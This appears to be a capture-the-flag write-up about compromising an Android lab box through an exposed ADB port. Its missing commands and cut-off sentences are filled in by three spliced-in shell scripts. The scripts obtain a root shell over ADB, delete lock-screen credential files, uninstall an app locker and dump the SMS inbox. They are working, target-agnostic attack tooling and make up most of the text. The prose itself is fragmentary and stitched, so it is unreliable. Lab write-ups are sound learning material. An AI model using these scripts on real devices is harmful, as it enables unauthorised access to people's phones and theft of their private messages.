Hi all. At first I didn't want to try this box because I had no idea how to pentest an Android box. In real life I don't even use or own a smartphone, but then I said to myself that it's a great way to learn something new, so let's pwn it!
You can find the machine here: Investigator
Let's start, as always, with nmap.
Port 5555 seems suspicious. I did some research on it and found a way to exploit it. :)
Port 5555 is the adb service. adb (Android Debug Bridge) lets you control an Android device over USB, or over the network when the adbd daemon is listening on TCP port 5555. On this box the daemon is reachable from the network and accepts our connection without prompting, so anyone who can reach the port gets a shell on the device.
sudo apt-get install adb
Exploiting adb service
Now let's exploit it. First we need to connect to the target:
Now let's spawn a shell:
Bingo! It's that simple. We can even go one step further and take a root shell:
Now, because I had no idea how the Android file system works, I decided to search starting from the root directory:
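The connect-and-shell steps above, written out as an added example script (not the write-up's own commands). It reads the target IP from an ADB_TARGET environment variable (my assumption), checks that adb reports the device as usable rather than "unauthorized" or "offline", and checks whether the shell is already uid 0 before trying to escalate.

```shell
#!/bin/sh
# Added example (not from the original write-up): connect to an ADB daemon exposed
# on TCP 5555, make sure the device is in the "device" state, and confirm whether
# the shell we get is root. Target IP comes from $ADB_TARGET (assumption).
set -eu

ADB_PORT=5555

# Given the text of `adb devices` and a serial (ip:port), print that device's state:
# "device" is usable, "unauthorized" means adbd wants RSA key approval, "offline"
# means the TCP session is up but adbd is not answering, "absent" if not listed.
device_state() {
    printf '%s\n' "$1" | awk -v s="$2" '$1 == s { print $2; found = 1 } END { if (!found) print "absent" }'
}

# Pull the numeric uid out of the output of `id` ("uid=2000(shell) ..." -> 2000).
uid_from_id() {
    printf '%s\n' "$1" | tr -d '\r' | sed -n 's/^uid=\([0-9][0-9]*\)(.*/\1/p'
}

# Run one command on the device; tr strips the CR some adb versions append.
remote() {
    adb -s "$1" shell "$2" | tr -d '\r'
}

main() {
    target="${ADB_TARGET}:${ADB_PORT}"
    adb connect "$target"
    state=$(device_state "$(adb devices)" "$target")
    if [ "$state" != "device" ]; then
        echo "device is '$state', not usable" >&2
        exit 1
    fi
    uid=$(uid_from_id "$(remote "$target" id)")
    echo "shell uid on target: $uid"
    if [ "$uid" != "0" ]; then
        # Two common ways up: restart adbd as root (works on userdebug/eng builds)
        # or ask for su inside the shell. Which one works depends on the image.
        adb -s "$target" root || true
        uid=$(uid_from_id "$(remote "$target" 'su -c id 2>/dev/null || id')")
        echo "uid after escalation attempt: $uid"
    fi
}

# Only talk to a device when a target was supplied.
if [ -n "${ADB_TARGET:-}" ]; then
    main
fi
```

If the state comes back "unauthorized", the daemon is enforcing RSA key approval and you would need the device to accept your key; on this box it does not get that far, which is exactly why the port is a problem.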
We can see a
Removing the PIN - finding the real flag
Here I got stuck. I was searching for the flag for a lot of hours, then I deleted the box and said OK, I got a root shell but I can't find the real flag. Today I had a chat with a friend about this box and we were both stuck finding the real flag; I told him that you can remove the PIN using the adb shell. After some minutes he found the real flag! Shout out to @Freakazoid, without him I wouldn't have been able to get the real flag! :D
Now, as you can see, the Android box asks for a PIN:
We can remove it using our root shell; simply do this:
Then reboot the box, and now we can see there is no PIN:
If we go to open an app, it asks for a pattern:
Probably there is an app running in the background that locks the other apps. Let's search for it and remove it:
com.martianmode.applock seems interesting, so let's remove it:
Now we can see the real flag in Messages:
I learnt some new stuff, fun box :)
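The PIN removal and app-lock cleanup above, as an added example script (these are not the write-up's own commands). It assumes the device serial is in $ADB_TARGET, that su works inside the adb shell, and that the lock-screen credential files live at the paths listed in the script, which are the usual locations on Android 6 to 9 images; run `ls /data/system` on the target before trusting them. The package filter just looks for "lock" in the name, which is enough to surface com.martianmode.applock here.

```shell
#!/bin/sh
# Added example (not the write-up's own commands): with a root shell over adb,
# wipe the lock-screen credential files, reboot, list packages, and uninstall
# anything that looks like an app locker. Assumptions: serial in $ADB_TARGET,
# `su` available in the adb shell, credential files at the assumed paths below.
set -eu

# Lock-screen credential stores (assumed paths; check ls /data/system first).
# With these gone the lock screen has no credential to check after reboot.
LOCK_FILES="/data/system/locksettings.db
/data/system/locksettings.db-wal
/data/system/locksettings.db-shm
/data/system/gatekeeper.password.key
/data/system/gatekeeper.pattern.key
/data/system/gesture.key
/data/system/password.key"

# Run one command as root on the device via su; tr strips CRs from the output.
as_root() {
    adb -s "$ADB_TARGET" shell "su -c '$1'" | tr -d '\r'
}

# One rm -f over every credential file, so it is a single su round-trip and
# files that do not exist on this image are silently skipped.
rm_lock_command() {
    printf 'rm -f %s' "$(printf '%s' "$LOCK_FILES" | tr '\n' ' ')"
}

# From `pm list packages` output ("package:com.example.app" per line), print the
# package names whose name suggests an app locker.
lock_app_candidates() {
    printf '%s\n' "$1" | tr -d '\r' | sed -n 's/^package://p' | grep -i 'lock' || true
}

main() {
    as_root "$(rm_lock_command)"
    adb -s "$ADB_TARGET" reboot
    # The TCP adb session dies with the reboot, so reconnect once adbd is back.
    sleep 20
    adb connect "$ADB_TARGET"
    adb -s "$ADB_TARGET" wait-for-device
    for pkg in $(lock_app_candidates "$(as_root 'pm list packages')"); do
        echo "removing $pkg"
        as_root "pm uninstall $pkg"
    done
}

if [ -n "${ADB_TARGET:-}" ]; then
    main
fi
```

Review the candidate list before uninstalling on anything that is not a lab box: a name containing "lock" is a heuristic, not proof that the package is the one drawing the pattern prompt.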
Update - Reading SMS without physical access
There is a way to read the SMS (flag) without doing all of the above, by accessing the
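One way to read the messages over adb without ever touching the lock screen or the app locker, as an added example (not the write-up's method, which is cut off above): query the telephony content provider with the `content` tool that ships on Android. It assumes the device serial is in $ADB_TARGET and that su works in the adb shell, since the plain shell user may lack READ_SMS on some images.

```shell
#!/bin/sh
# Added example (not from the write-up): read SMS rows straight from the
# telephony content provider over adb. Assumes serial in $ADB_TARGET and that
# `su` works in the adb shell (try without su first; some images do not need it).
set -eu

SMS_URI="content://sms/inbox"

# Turn `content query` output into "address|body" lines. Each row looks like
# "Row: 0 address=+15551234567, body=some text". body is requested last in the
# projection so a comma inside the message does not cut the body short.
sms_rows() {
    printf '%s\n' "$1" | tr -d '\r' | sed -n \
        's/^Row: [0-9][0-9]* address=\([^,]*\), body=\(.*\)$/\1|\2/p'
}

# Only the bodies, so the output can be grepped for the flag format.
sms_bodies() {
    sms_rows "$1" | sed 's/^[^|]*|//'
}

main() {
    # --projection restricts the columns; address:body keeps body last (see above).
    out=$(adb -s "$ADB_TARGET" shell \
        "su -c 'content query --uri $SMS_URI --projection address:body'")
    sms_rows "$out"
}

if [ -n "${ADB_TARGET:-}" ]; then
    main
fi
```

Because this talks to the SMS provider directly, a third-party locker that only gates the Messages UI cannot get in the way; that is the same reason the app lock was never a real security boundary once adb was exposed.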